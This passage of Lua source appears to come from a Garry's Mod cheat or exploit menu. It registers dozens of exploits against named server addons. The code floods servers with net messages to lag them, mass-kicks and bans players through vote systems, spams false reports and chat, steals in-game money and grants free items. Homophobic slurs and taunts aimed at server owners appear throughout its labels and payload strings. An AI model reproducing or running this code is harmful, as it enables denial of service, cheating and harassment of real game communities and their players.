  870. end)
  871. ECNotify("Starting Lagger")
  872. else
  873. timer.Remove("lagger7")
  874. ECNotify("Stopping Lagger")
  875. end
  876. end)
  877. end
  879. status = ValidNetString("gMining.sellMineral")
  880. if (status) then
  881. ECPrint("Found Exploit: Lagger #8 [gMining.sellMineral]")
  882. addExploit( "30","Lagger #8", "discovered by Leith, an exploit in the addon 'gMining'", function()
  883. surface.PlaySound("garrysmod/ui_click.wav")
  884. ECNotify("Starting")
  885. if !timer.Exists( "lagger8" ) then
  886. timer.Create("lagger8", 0, 0, function()
  887. for i = 1, 1000 do
  888. net.Start("gMining.sellMineral",true)
  889. net.WriteInt(9999999999999999999999999999999999999999999999999999999999, 3)
  890. net.WriteString(" ")
  891. net.SendToServer()
  892. end
  893. end )
  894. end
  895. end )
  896. end
  898. status = ValidNetString("PlayerUseItem")
  899. if (status) then
  900. ECPrint("Found Exploit: Lagger #9 [PlayerUseItem]")
  901. addExploit( "31","Lagger #9", "discovered by triggered", function()
  902. surface.PlaySound("garrysmod/ui_click.wav")
  903. if !timer.Exists( "lagger9" ) then
  904. timer.Create("lagger9", 0,0, function()
  905. for i = 1, 800 do
  906. net.Start("PlayerUseItem",true)
  907. net.WriteInt(99999999999999999999999999999999999999999999999, 32)
  908. net.SendToServer()
  909. end
  910. end)
  911. ECNotify("Starting Lagger")
  912. else
  913. timer.Remove("lagger9")
  914. ECNotify("Stopping Lagger")
  915. end
  916. end)
  917. end
  919. status = ValidNetString("RequestMAPSize")
  920. if (status) then
  921. ECPrint("Found Exploit: Lagger #10 [RequestMAPSize]")
  922. addExploit( "32","Lagger #10", "1tap server", function()
  923. surface.PlaySound("garrysmod/ui_click.wav")
  924. if !timer.Exists( "lagger10" ) then
  925. timer.Create("lagger10", 0, 0, function()
  926. for i = 1, 400 do
  927. net.Start("RequestMAPSize",true)
  928. net.SendToServer()
  929. end
  930. end)
  931. ECNotify("Starting Lagger")
  932. else
  933. timer.Remove("lagger10")
  934. ECNotify("Stopping Lagger")
  935. end
  936. end )
  937. end
  939. status = ValidNetString("MG2.Request.GangRankings")
  940. if (status) then
  941. ECPrint("Found Exploit: Lagger #11 [MG2.Request.GangRankings]")
  942. addExploit( "33","Lagger #11", "discovered by Leith, an exploit in the addon 'MGangs 2'", function()
  943. surface.PlaySound("garrysmod/ui_click.wav")
  944. if !timer.Exists( "lagger11" ) then
  945. timer.Create("lagger11", 0, 0, function()
  946. for i = 1, 1000 do
  947. net.Start("MG2.Request.GangRankings",true)
  948. net.SendToServer()
  949. end
  950. end)
  951. ECNotify("Starting Lagger")
  952. else
  953. timer.Remove("lagger11")
  954. ECNotify("Stopping Lagger")
  955. end
  956. end )
  957. end
  959. status = ValidNetString("dLogsGetCommand")
  960. if (status) then
  961. ECPrint("Found Exploit: Lagger #12 [dLogsGetCommand]")
  962. addExploit( "34","Lagger #12", "b1g lags", function()
  963. surface.PlaySound("garrysmod/ui_click.wav")
  964. ECNotify("Starting Lagger")
  965. for i=1,7000 do
  966. net.Start("dLogsGetCommand",true)
  967. net.WriteTable({ cmd = "+forward" , args = " " })
  968. net.SendToServer()
  969. end
  970. end )
  971. end
  973. status = ValidNetString("ats_send_toServer")
  974. if (status) then
  975. ECPrint("Found Exploit: Lagger #13 [ats_send_toServer]")
  976. addExploit( "35","Lagger #13", "big lags", function()
  977. surface.PlaySound("garrysmod/ui_click.wav")
  978. ECNotify("Starting Lagger")
  979. for i=1,2000 do
  980. net.Start("ats_send_toServer",true)
  981. net.WriteTable({ " " , "Open" , nil , nil , nil , nil })
  982. net.SendToServer()
  983. end
  984. end )
  985. end
  987. status = ValidNetString("shopguild_buyitem")
  988. if (status) then
  989. ECPrint("Found Exploit: Guild Exploit [shopguild_buyitem]")
  990. addExploit( "36","Guild Exploit", "increases the level of your guild", function()
  991. surface.PlaySound("garrysmod/ui_click.wav")
  992. ECPrint("Guild level successfully upgraded")
  993. local level = tonumber(LocalPlayer():GetNWInt("lvlguild"))
  994. if level > tonumber(LocalPlayer():GetNWInt("lvlguild")) then level = tonumber(LocalPlayer():GetNWInt("lvlguild")) end
  995. net.Start("shopguild_buyitem")
  996. net.WriteString("lvl")
  997. net.WriteDouble(level)
  998. net.WriteString("Guild Level "..level)
  999. net.WriteEntity(LocalPlayer())
  1000. net.WriteUInt(2,4)
  1001. net.WriteDouble(0)
  1002. net.SendToServer()
  1003. level = level + 1
  1004. end )
  1005. end
  1007. status = ValidNetString("VoteKickNO")
  1008. if (status) then
  1009. ECPrint("Found Exploit: Votekick [VoteKickNO]")
  1010. addExploit( "37","Votekick", "kicking all", function()
  1011. surface.PlaySound("garrysmod/ui_click.wav")
  1012. for k,v in pairs(player.GetAll()) do
  1013. net.Start("VoteKickNO")
  1014. net.WriteFloat(v:EntIndex())
  1015. net.WriteFloat(6)
  1016. net.SendToServer()
  1017. net.Start("VoteKickNO")
  1018. net.WriteFloat(v:EntIndex())
  1019. net.WriteFloat(6)
  1020. net.SendToServer()
  1021. net.Start("VoteKickNO")
  1022. net.WriteFloat(v:EntIndex())
  1023. net.WriteFloat(6)
  1024. net.SendToServer()
  1025. net.Start("VoteKickNO")
  1026. net.WriteFloat(v:EntIndex())
  1027. net.WriteFloat(6)
  1028. net.SendToServer()
  1029. end
  1030. end )
  1031. end
  1033. status = ValidNetString("VoteBanNO")
  1034. if (status) then
  1035. ECPrint("Found Exploit: Voteban [VoteBanNO]")
  1036. addExploit( "38","Voteban", "bans all", function()
  1037. surface.PlaySound("garrysmod/ui_click.wav")
  1038. for k,v in pairs(player.GetAll()) do
  1039. net.Start("VoteBanNO")
  1040. net.WriteFloat(v:EntIndex())
  1041. net.WriteFloat(8)
  1042. net.SendToServer()
  1043. net.Start("VoteBanNO")
  1044. net.WriteFloat(v:EntIndex())
  1045. net.WriteFloat(8)
  1046. net.SendToServer()
  1047. net.Start("VoteBanNO")
  1048. net.WriteFloat(v:EntIndex())
  1049. net.WriteFloat(8)
  1050. net.SendToServer()
  1051. end
  1052. end )
  1053. end
  1055. status = ValidNetString("NewReport")
  1056. if (status) then
  1057. ECPrint("Found Exploit: Custom Report [NewReport]")
  1058. addExploit( "39","Custom Report", "Report all faggots", function()
  1059. surface.PlaySound("garrysmod/ui_click.wav")
  1060. for k,v in pairs(player.GetAll()) do
  1061. net.Start("NewReport")
  1062. net.WriteType(ply)
  1063. net.WriteInt(8,5)
  1064. net.WriteString("hahaha")
  1065. net.SendToServer()
  1066. end
  1067. end )
  1068. end
  1070. status = ValidNetString("Warn_CreateWarn")
  1071. if (status) then
  1072. ECPrint("Found Exploit: Custom Warn [Warn_CreateWarn]")
  1073. addExploit( "40","Custom Warn", "Warn all faggots", function()
  1074. surface.PlaySound("garrysmod/ui_click.wav")
  1075. for k,v in pairs(player.GetAll()) do
  1076. net.Start("Warn_CreateWarn")
  1077. net.WriteEntity(ply)
  1078. net.WriteString("hahaha")
  1079. net.SendToServer()
  1080. end
  1081. end )
  1082. end
  1084. status = ValidNetString("showDisguiseHUD")
  1085. if (status) then
  1086. ECPrint("Found Exploit: Disguise #2 [showDisguiseHUD]")
  1087. addExploit( "41","Disguise #2", "allows you to disguise as any job", function()
  1088. surface.PlaySound("garrysmod/ui_click.wav")
  1089. ECPrint("Choose a disguise")
  1090. PlayerCount = 0
  1091. for k, v in pairs(player.GetAll()) do
  1092. PlayerCount = PlayerCount + 1
  1093. end
  1094. local TeamNum
  1095. local disguise_Model_Preview_Default
  1096. local base = vgui.Create("DFrame")
  1097. base:SetSize(300,420)
  1098. base:Center()
  1099. base:SetTitle(" ")
  1100. base:ShowCloseButton(false)
  1101. base:MakePopup()
  1102. function base:Paint()
  1103. draw.RoundedBoxEx( 5, 0, 0, base:GetWide(), base:GetTall(), Color(20,20,20,200),false,true)
  1104. draw.RoundedBox( 0, 0, 30, base:GetWide(), base:GetTall()-60, Color(10,10,10,200))
  1105. draw.RoundedBox( 0, 0, 30, base:GetWide(), 5, Color(255,255,255,255))
  1106. draw.RoundedBox( 0, 0, 390, base:GetWide(), 5, Color(255,255,255,255))
  1107. draw.SimpleText("Disguise", "DisFontBold", base:GetWide()/4, -1)
  1108. end
  1109. local ExitButton = vgui.Create("DButton", base)
  1110. ExitButton:SetPos(base:GetWide()+4-ExitButton:GetWide())
  1111. ExitButton:SetText("Close")
  1112. ExitButton:SetSize(60,20)
  1113. ExitButton:SetFont("DermaDefaultBold")
  1114. ExitButton.Paint = function()
  1115. if ExitButton.Hovered then
  1116. if ExitButton:IsDown() then
  1117. ExitButton:SetTextColor(Color(200,200,200,200))
  1118. draw.RoundedBoxEx(5,0,0, ExitButton:GetWide(), ExitButton:GetTall(), Color(255,0,0,200),false,true)
  1119. else
  1120. ExitButton:SetTextColor(Color(255,255,255,255))
  1121. draw.RoundedBoxEx(5,0,0, ExitButton:GetWide(), ExitButton:GetTall(), Color(255,0,0,255),false,true)
  1122. end
  1123. else
  1124. ExitButton:SetTextColor(Color(20,20,20,200))
  1125. draw.RoundedBoxEx(5,0,0, ExitButton:GetWide(), ExitButton:GetTall(), Color(200,0,0,200),false,true)
  1126. end
  1127. end
  1128. function ExitButton.DoClick()
  1129. base:Remove()
  1130. net.Start("changeToPhysgun")
  1131. net.SendToServer()
  1132. end
  1133. local DTeamChoice = vgui.Create("DComboBox", base)
  1134. DTeamChoice:SetSize(150, 22)
  1135. DTeamChoice:SetPos(75, 50)
  1136. DTeamChoice:SetValue("Select Job")
  1137. for k, v in pairs(team.GetAllTeams()) do
  1138. if !(HIDDEN_TEAMS[ k ] ) and (team.NumPlayers(k) ~= 0) then DTeamChoice:AddChoice(team.GetName(k)) end
  1139. end
  1140. DTeamChoice.OnSelect = function(panel, index, value)
  1141. for k,_ in pairs(team.GetAllTeams()) do
  1142. if value == team.GetName(k) then
  1143. for _, v in pairs(player.GetAll())do
  1144. if v:Team() == k then
  1145. TeamNum = v:Team()
  1146. disguise_Model_Preview_Default = v:GetModel()
  1147. end
  1148. end
  1149. end
  1150. end
  1151. timer.Create("RefreshModel", 0.1, 0, function()
  1152. local icon = vgui.Create( "DModelPanel", base )
  1153. icon:SetSize(300, 260)
  1154. icon:SetPos(-5, 80)
  1155. icon:SetFOV(68)
  1156. icon:SetModel( disguise_Model_Preview_Default )
  1157. timer.Simple(0.1, function()
  1158. icon:Remove()
  1159. end)
  1160. end)
  1161. local DisguiseButton = vgui.Create("DButton", base)
  1162. DisguiseButton:SetPos(base:GetWide()/2.5, 360)
  1163. DisguiseButton:SetSize(60,20)
  1164. DisguiseButton:SetText("Accept")
  1165. DisguiseButton:SetFont("DermaDefaultBold")
  1166. function DisguiseButton:Paint()
  1167. if DisguiseButton.Hovered then
  1168. if DisguiseButton:IsDown() then
  1169. DisguiseButton:SetTextColor(Color(200,200,200,200))
  1170. draw.RoundedBoxEx(0,0,0, DisguiseButton:GetWide(), DisguiseButton:GetTall(), Color(60,200,0,200))
  1171. else
  1172. DisguiseButton:SetTextColor(Color(255,255,255,255))
  1173. draw.RoundedBoxEx(0,0,0, DisguiseButton:GetWide(), DisguiseButton:GetTall(), Color(60,220,0,255))
  1174. end
  1175. else
  1176. DisguiseButton:SetTextColor(Color(20,20,20,200))
  1177. draw.RoundedBoxEx(0,0,0, DisguiseButton:GetWide(), DisguiseButton:GetTall(), Color(60,200,0,255))
  1178. end
  1179. end
  1180. function DisguiseButton:DoClick()
  1181. net.Start("SetPlayerModel")
  1182. if ChosenName == nil then
  1183. net.WriteString(LocalPlayer():Nick())
  1184. else
  1185. net.WriteString(ChosenName)
  1186. end
  1187. net.WriteUInt(TeamNum, 16)
  1188. net.SendToServer()
  1189. base:Close()
  1190. net.Start("changeToPhysgun")
  1191. net.SendToServer()
  1192. end
  1193. end
  1194. end
  1195. )
  1196. end
  1198. status = ValidNetString("Chatbox_PlayerChat")
  1199. if (status) then
  1200. ECPrint("Found Exploit: WilloxChat Spam [Chatbox_PlayerChat]")
  1201. addExploit( "42","WilloxChat Spam", "spam in chat", function()
  1202. surface.PlaySound("garrysmod/ui_click.wav")
  1203. ECNotify("Starting")
  1204. timer.Create("willoxchatspam", 1, 0, function()
  1205. net.Start("Chatbox_PlayerChat")
  1206. net.WriteEntity(LocalPlayer())
  1207. net.WriteBit(1)
  1208. net.WriteString("FAGGOTS")
  1209. net.WriteBit(1)
  1210. net.SendToServer()
  1211. end )
  1212. end )
  1213. end
  1215. status = ValidNetString("BuilderXToggleKill")
  1216. if (status) then
  1217. ECPrint("Found Exploit: BuilderXToggleKill [BuilderXToggleKill]")
  1218. addExploit( "43","BuilderXToggleKill", "old exploit, i dont remember what he was doing", function()
  1219. surface.PlaySound("garrysmod/ui_click.wav")
  1220. ECNotify("Starting")
  1221. for k, v in pairs(player.GetAll()) do
  1222. net.Start("BuilderXToggleKill")
  1223. net.WriteEntity(ply)
  1224. net.SendToServer()
  1225. end
  1226. end )
  1227. end
  1229. status = ValidNetString("reports.submit")
  1230. if (status) then
  1231. ECPrint("Found Exploit: Report All [reports.submit]")
  1232. addExploit( "44","Report All", "Report all faggots", function()
  1233. surface.PlaySound("garrysmod/ui_click.wav")
  1234. ECNotify("Starting")
  1235. for k,v in pairs(player.GetAll()) do
  1236. net.Start("reports.submit")
  1237. net.WriteEntity(v)
  1238. net.WriteInt(5, 8)
  1239. net.WriteString("SuckMyDick")
  1240. net.SendToServer()
  1241. end
  1242. end )
  1243. end
  1245. status = ValidNetString("services_accept")
  1246. if (status) then
  1247. ECPrint("Found Exploit: Infernus Service Accept [services_accept]")
  1248. addExploit( "45","Infernus Service Accept", "spam to all players", function()
  1249. surface.PlaySound("garrysmod/ui_click.wav")
  1250. ECNotify("Starting")
  1251. timer.Create("serviceaccept", 0, 0, function()
  1252. for k,v in pairs(player.GetAll()) do
  1253. net.Start("services_accept")
  1254. net.WriteString("Nice security, retards xd")
  1255. net.WriteVector(Vector(v:GetPos()))
  1256. net.WriteString("test image")
  1257. net.WriteEntity(v)
  1258. net.SendToServer()
  1259. end
  1260. end )
  1261. timer.Simple(4, function()
  1262. timer.Destroy("serviceaccept")
  1263. end )
  1264. end )
  1265. end
  1267. status = ValidNetString("lockpick_sound")
  1268. if (status) then
  1269. ECPrint("Found Exploit: LockPick Sound Spam [lockpick_sound]")
  1270. addExploit( "46","LockPick Sound Spam", "", function()
  1271. surface.PlaySound("garrysmod/ui_click.wav")
  1272. ECNotify("Starting")
  1273. timer.Create( "spamlockpicksound", 3, 0, function()
  1274. for k, v in pairs( player.GetAll() ) do
  1275. net.Start("lockpick_sound")
  1276. net.WriteEntity(v)
  1277. net.SendToServer()
  1278. end
  1279. end )
  1280. timer.Simple(4, function()
  1281. timer.Destroy("spamlockpicksound")
  1282. end )
  1283. end )
  1284. end
  1286. status = ValidNetString("customprinter_get")
  1287. if (status) then
  1288. ECPrint("Found Exploit: Realistic Printers Steal Money [customprinter_get]")
  1289. addExploit( "47","Realistic Printers Steal Money", "stealing money from printers", function()
  1290. surface.PlaySound("garrysmod/ui_click.wav")
  1291. ECNotify("Starting")
  1292. for k, v in pairs(ents.GetAll()) do
  1293. if v:GetClass():find("print") then
  1294. net.Start("customprinter_get")
  1295. net.WriteEntity(v)
  1296. net.WriteString("g_money")
  1297. net.SendToServer()
  1298. end
  1299. end
  1300. end )
  1301. end
  1303. status = ValidNetString("InformPlayer")
  1304. if (status) then
  1305. ECPrint("Found Exploit: SimpleGrab Inform [InformPlayer]")
  1306. addExploit( "48","SimpleGrab Inform", "Spam all players in the console", function()
  1307. surface.PlaySound("garrysmod/ui_click.wav")
  1308. ECNotify("Starting")
  1309. for k,v in pairs(player.GetAll()) do
  1310. for i = 0, 100 do
  1311. net.Start("InformPlayer")
  1312. net.WriteEntity(v)
  1313. net.SendToServer()
  1314. end
  1315. end
  1316. end )
  1317. end
  1319. status = ValidNetString("pogcp_report_submitReport")
  1320. if (status) then
  1321. ECPrint("Found Exploit: Report All #2 [pogcp_report_submitReport]")
  1322. addExploit( "49","Report All #2", "Report all faggots", function()
  1323. surface.PlaySound("garrysmod/ui_click.wav")
  1324. ECNotify("Starting")
  1325. for i = 0, 100 do
  1326. for k,v in pairs(player.GetAll()) do
  1327. net.Start("pogcp_report_submitReport")
  1328. net.WriteString("lol")
  1329. net.WriteString("nice security retards")
  1330. net.WriteEntity(v)
  1331. net.SendToServer()
  1332. end
  1333. end
  1334. end )
  1335. end
  1337. status = ValidNetString("1942_Fuhrer_SubmitCandidacy")
  1338. if (status) then
  1339. ECPrint("Found Exploit: Fuhrer Submit Candidacy [1942_Fuhrer_SubmitCandidacy]")
  1340. addExploit( "50","Fuhrer Submit Candidacy", "you instantly become a Fuhrer, Sieg Heil", function()
  1341. surface.PlaySound("garrysmod/ui_click.wav")
  1342. ECNotify("Starting")
  1343. net.Start("1942_Fuhrer_SubmitCandidacy")
  1344. net.WriteString(LocalPlayer():Nick())
  1345. net.SendToServer()
  1346. end )
  1347. end
  1349. status = ValidNetString("FacCreate")
  1350. if (status) then
  1351. ECPrint("Found Exploit: Fac Create [FacCreate]")
  1352. addExploit( "51","Fac Create", "old exploit", function()
  1353. surface.PlaySound("garrysmod/ui_click.wav")
  1354. ECNotify("Starting")
  1355. timer.Create("fucklol", 1, 0, function()
  1356. net.Start("FacCreate")
  1357. net.WriteString("LOL " .. random_string(5))
  1358. net.WriteString("LOL " .. random_string(10))
  1359. net.WriteColor(random_color())
  1360. net.WriteBool(false)
  1361. net.WriteString(random_string(5))
  1362. net.SendToServer()
  1363. end )
  1364. end )
  1365. end
  1367. status = ValidNetString("FactionInviteConsole")
  1368. if (status) then
  1369. ECPrint("Found Exploit: Faction Invite [FactionInviteConsole]")
  1370. addExploit( "52","Faction Invite", "", function()
  1371. surface.PlaySound("garrysmod/ui_click.wav")
  1372. ECNotify("Starting")
  1373. timer.Create("lovedarkexploitsxd", 1, 0, function()
  1374. for k, v in pairs(player.GetAll()) do
  1375. net.Start("FactionInviteConsole")
  1376. net.WriteEntity( ply )
  1377. net.WriteEntity(table.Random(player.GetAll()))
  1378. net.SendToServer()
  1379. end
  1380. end )
  1381. end )
  1382. end
  1384. status = ValidNetString("WithdrewBMoney")
  1385. if (status) then
  1386. ECPrint("Found Exploit: Free Money #2 [WithdrewBMoney]")
  1387. addExploit( "53","Free Money #2", "an exploit in the addon 'business'", function()
  1388. surface.PlaySound("garrysmod/ui_click.wav")
  1389. ECNotify("Starting")
  1390. net.Start("WithdrewBMoney")
  1391. net.WriteInt(50000,32)
  1392. net.SendToServer()
  1393. end )
  1394. end
  1396. status = ValidNetString("deathrag_takeitem")
  1397. if (status) then
  1398. ECPrint("Found Exploit: Easy Items [deathrag_takeitem]")
  1399. addExploit( "54","Easy Items", "collects money, weapons", function()
  1400. surface.PlaySound("garrysmod/ui_click.wav")
  1401. ECNotify("Starting")
  1402. count = 0
  1403. for k, v in pairs( ents.GetAll() ) do
  1404. if v:GetClass() == "prop_ragdoll" then
  1405. count = count + 1
  1406. end
  1407. end
  1408. if count == 0 then
  1409. ECPrint("No items found")
  1410. else
  1411. ECPrint("Amount of items "..count)
  1412. end
  1413. for k, v in pairs( ents.GetAll() ) do
  1414. if v:GetClass() == "prop_ragdoll" then
  1415. for i=1,10 do
  1416. net.Start("deathrag_takeitem")
  1417. net.WriteEntity( v )
  1418. net.WriteInt(i,16)
  1419. net.SendToServer()
  1420. end
  1421. end
  1422. end
  1423. end )
  1424. end
  1426. status = ValidNetString("REPPurchase")
  1427. if (status) then
  1428. ECPrint("Found Exploit: Heal and Armor [REPPurchase]")
  1429. addExploit( "55","Heal and Armor", "armor and hp", function()
  1430. surface.PlaySound("garrysmod/ui_click.wav")
  1431. ECNotify("Starting")
  1432. if LocalPlayer():Health() < 99 then
  1433. net.Start("REPPurchase")
  1434. net.WriteString("HEALTH")
  1435. net.SendToServer()
  1436. end
  1437. if LocalPlayer():Armor() < 99 then
  1438. net.Start("REPPurchase")
  1439. net.WriteString("ARMOR")
  1440. net.SendToServer()
  1441. end
  1442. end )
  1443. end
  1445. status = ValidNetString("BTTTStartVotekick")
  1446. if (status) then
  1447. ECPrint("Found Exploit: Votekick #2 [BTTTStartVotekick]")
  1448. addExploit( "56","Votekick #2", "kick all noobs", function()
  1449. surface.PlaySound("garrysmod/ui_click.wav")
  1450. ECNotify("Starting")
  1451. for k,v in pairs(player.GetAll()) do
  1452. if v != LocalPlayer() then
  1453. net.Start("BTTTStartVotekick")
  1454. net.Start("_nonDBVMVote")
  1455. net.WriteEntity(v)
  1456. net.WriteString("")
  1457. net.WriteString("1")
  1458. net.SendToServer()
  1459. end
  1460. end
  1461. end )
  1462. end
  1464. status = ValidNetString("Resupply")
  1465. if (status) then
  1466. ECPrint("Found Exploit: Respawn Equipment [Resupply]")
  1467. addExploit( "57","Respawn Equipment", "", function()
  1468. surface.PlaySound("garrysmod/ui_click.wav")
  1469. ECNotify("Starting")
  1470. net.Start("Resupply")
  1471. net.SendToServer()
  1472. end )
  1473. end
  1475. status = ValidNetString("DarkRP_Defib_ForceSpawn")
  1476. if (status) then
  1477. ECPrint("Found Exploit: Respawn #2 [DarkRP_Defib_ForceSpawn]")
  1478. addExploit( "58","Respawn #2", "just respawn", function()
  1479. surface.PlaySound("garrysmod/ui_click.wav")
  1480. ECNotify("Respawn")
  1481. net.Start("DarkRP_Defib_ForceSpawn")
  1482. net.SendToServer()
  1483. end )
  1484. end
  1486. status = ValidNetString("FiremanLeave")
  1487. if (status) then
  1488. ECPrint("Found Exploit: Fireman Leave [FiremanLeave]")
  1489. addExploit( "59","Fireman Leave", "", function()
  1490. surface.PlaySound("garrysmod/ui_click.wav")
  1491. ECNotify("Starting")
  1492. net.Start("FiremanLeave")
  1493. net.SendToServer()
  1494. end )
  1495. end
  1497. status = ValidNetString("PoliceJoin")
  1498. if (status) then
  1499. ECPrint("Found Exploit: Join the Police 1 [PoliceJoin]")
  1500. addExploit( "60","Join the Police 1", "joining the police", function()
  1501. surface.PlaySound("garrysmod/ui_click.wav")
  1502. ECNotify("Starting")
  1503. net.Start("PoliceJoin")
  1504. net.SendToServer()
  1505. end )
  1506. end
  1508. status = ValidNetString("CreateEntity")
  1509. if (status) then
  1510. ECPrint("Found Exploit: Create Entity [CreateEntity]")
  1511. addExploit( "61","Create Entity", "", function()
  1512. surface.PlaySound("garrysmod/ui_click.wav")
  1513. ECNotify("Starting")
  1514. for k,v in pairs(player.GetAll()) do
  1515. net.Start("CreateEntity")
  1516. net.WriteString("sent_arc_atm")
  1517. net.WriteFloat(100000000000000000000000000000000000000000000000000)
  1518. net.WriteEntity(v)
  1519. net.SendToServer()
  1520. end
  1521. end )
  1522. end
  1524. status = ValidNetString("CREATE_REPORT")
  1525. if (status) then
  1526. ECPrint("Found Exploit: CREATE REPORT [CREATE_REPORT]")
  1527. addExploit( "62","CREATE REPORT", "", function()
  1528. surface.PlaySound("garrysmod/ui_click.wav")
  1529. ECNotify("Starting")
  1530. local tab = {
  1531. REPORTER = v:Nick(),
  1532. REPORTERID = v:SteamID(),
  1533. FAGGOT = v:Nick(),
  1534. FAGGOTID = v:SteamID(),
  1535. INFO = "Say hi to youtube",
  1536. PROOF = ""
  1537. }
  1538. for k,v in pairs(player.GetAll()) do
  1539. net.Start("CREATE_REPORT")
  1540. net.WriteTable(tab)
  1541. net.SendToServer()
  1542. end
  1543. end )
  1544. end
  1546. status = ValidNetString("Hopping_Test")
  1547. if (status) then
  1548. ECPrint("Found Exploit: Hopping Test [Hopping_Test]")
  1549. addExploit( "62","Hopping Test", "", function()
  1550. surface.PlaySound("garrysmod/ui_click.wav")
  1551. ECNotify("Starting")
  1552. for k,v in pairs(player.GetAll()) do
  1553. net.Start("Hopping_Test")
  1554. net.WriteEntity(v)
  1555. net.WriteString("69.696.696969.69")
  1556. net.SendToServer()
  1557. end
  1558. end )
  1559. end
  1561. status = ValidNetString("CpForm_Answers")
  1562. if (status) then
  1563. ECPrint("Found Exploit: Join the Police 2 [CpForm_Answers]")
  1564. addExploit( "63","Join the Police 2", "joining the police #2", function()
  1565. surface.PlaySound("garrysmod/ui_click.wav")
  1566. ECNotify("Starting")
  1567. net.Start("CpForm_Answers")
  1568. net.WriteEntity(LocalPlayer())
  1569. net.WriteTable({})
  1570. net.SendToServer()
  1571. end )
  1572. end
  1574. status = ValidNetString("VehicleUnderglow")
  1575. if (status) then
  1576. ECPrint("Found Exploit: Vehicle Underglow [VehicleUnderglow]")
  1577. addExploit( "64","Vehicle Underglow", "", function()
  1578. surface.PlaySound("garrysmod/ui_click.wav")
  1579. ECNotify("Starting")
  1580. net.Start("VehicleUnderglow")
  1581. net.SendToServer()
  1582. end )
  1583. end
  1585. status = ValidNetString("OpenGates")
  1586. if (status) then
  1587. ECPrint("Found Exploit: Open Door #2 [OpenGates]")
  1588. addExploit( "65","Open Door #2", "Force open the door you are looking at", function()
  1589. surface.PlaySound("garrysmod/ui_click.wav")
  1590. ECNotify("Starting")
  1591. net.Start("OpenGates")
  1592. net.WriteEntity(LocalPlayer():GetEyeTrace().Entity)
  1593. net.SendToServer()
  1594. end )
  1595. end
  1597. status = ValidNetString("DemotePlayer")
  1598. if (status) then
  1599. ECPrint("Found Exploit: Demote All Players [DemotePlayer]")
  1600. addExploit( "66","Demote All Players", "Demote all players", function()
  1601. surface.PlaySound("garrysmod/ui_click.wav")
  1602. ECNotify("Starting")
  1603. for k, v in pairs(player.GetAll()) do
  1604. net.Start("DemotePlayer")
  1605. net.WriteString(v:SteamID())
  1606. net.SendToServer()
  1607. end
  1608. end )
  1609. end
  1611. status = ValidNetString("SendMail")
  1612. if (status) then
  1613. ECPrint("Found Exploit: Send Mail [SendMail]")
  1614. addExploit( "67","Send Mail", "sending mail to all players", function()
  1615. surface.PlaySound("garrysmod/ui_click.wav")
  1616. ECNotify("Starting")
  1617. for k,v in pairs(player.GetAll()) do
  1618. net.Start("SendMail")
  1619. net.WriteString("haha nice security retards")
  1620. net.WriteString(v:Nick())
  1621. net.SendToServer()
  1622. end
  1623. end )
  1624. end
  1626. status = ValidNetString("REPAdminChangeLVL")
  1627. if (status) then
  1628. ECPrint("Found Exploit: Admin Change Level [REPAdminChangeLVL]")
  1629. addExploit( "68","Admin Change Level", "free lvl", function()
  1630. surface.PlaySound("garrysmod/ui_click.wav")
  1631. ECNotify("Starting")
  1632. for k,v in pairs(player.GetAll()) do
  1633. net.Start("REPAdminChangeLVL")
  1634. net.WriteEntity(v)
  1635. net.WriteDouble(1090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000)
  1636. net.SendToServer()
  1637. end
  1638. end )
  1639. end
  1641. status = ValidNetString("BuyUpgradesStuff")
  1642. if (status) then
  1643. ECPrint("Found Exploit: Buy Upgrades [BuyUpgradesStuff]")
  1644. addExploit( "69","Buy Upgrades", "free upgrades", function()
  1645. surface.PlaySound("garrysmod/ui_click.wav")
  1646. ECNotify("Starting")
  1647. net.Start("BuyUpgradesStuff")
  1648. net.WriteString("")
  1649. net.WriteFloat(-100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000)
  1650. net.SendToServer()
  1651. end )
  1652. end
  1654. status = ValidNetString("SquadGiveWeapon")
  1655. if (status) then
  1656. ECPrint("Found Exploit: Give Weapons [SquadGiveWeapon]")
  1657. addExploit( "70","Give Weapons", "easy weapon", function()
  1658. surface.PlaySound("garrysmod/ui_click.wav")
  1659. inputFrameExists = true
  1660. inputFrame = vgui.Create( "DFrame" )
  1661. inputFrame:SetTitle("Choose a weapon!")
  1662. inputFrame:SetSize( 400, 75 )
  1663. inputFrame:SetPos(ScrW() / 2 - inputFrame:GetWide() / 2, ScrH() / 2 + 230 )
  1664. inputFrame:SetDraggable(false)
  1665. inputFrame:ShowCloseButton(true)
  1666. inputFrame:MakePopup()
  1667. inputFrame.Paint = function( self, w, h )
  1668. draw.RoundedBox( 5, 0, 0, w, h, Color(30, 30, 30))
  1669. end
  1670. local TextEntry = vgui.Create( "DTextEntry", inputFrame )
  1671. TextEntry:SetSize( 380, 30 )
  1672. TextEntry:SetPos( inputFrame:GetWide() / 2 - TextEntry:GetWide() / 2, inputFrame:GetTall() / 2 - TextEntry:GetTall() / 2 )
  1673. TextEntry:SetText( "ls_sniper" )
  1674. TextEntry.OnEnter = function( self )
  1675. surface.PlaySound("garrysmod/ui_click.wav")
  1676. ECNotify("Giving Weapon")
  1677. net.Start("SquadGiveWeapon")
  1678. net.WriteString( self:GetValue() )
  1679. net.WriteEntity(LocalPlayer())
  1680. net.SendToServer()
  1681. inputFrame:SetVisible(false)
  1682. end
  1683. end )
  1684. end
  1686. status = ValidNetString("SetTableTarget")
  1687. if (status) then
  1688. ECPrint("Found Exploit: Set Table Target [SetTableTarget]")
  1689. addExploit( "71","Set Table Target", "", function()
  1690. surface.PlaySound("garrysmod/ui_click.wav")
  1691. ECNotify("Starting")
  1692. net.Start("SetTableTarget")
  1693. net.WriteString("pername")
  1694. net.WriteString("perjob")
  1695. net.WriteInt(-10000000000000, 32)
  1696. net.WriteString("hitmansel")
  1697. net.WriteString("Anony.")
  1698. net.WriteString("")
  1699. net.WriteFloat(0)
  1700. net.WriteInt(-10000000000000, 32)
  1701. net.SendToServer()
  1702. end )
  1703. end
  1705. status = ValidNetString("UpdateRPUModelSQL")
  1706. if (status) then
  1707. ECPrint("Found Exploit: Change character model [UpdateRPUModelSQL]")
  1708. addExploit( "72","Change character model", "", function()
  1709. surface.PlaySound("garrysmod/ui_click.wav")
  1710. ECNotify("Starting")
  1711. net.Start("UpdateRPUModelSQL")
  1712. net.WriteString(LocalPlayer():GetEyeTrace().Entity:GetModel())
  1713. net.SendToServer()
  1714. end )
  1715. end
  1717. status = ValidNetString("disguise")
  1718. if (status) then
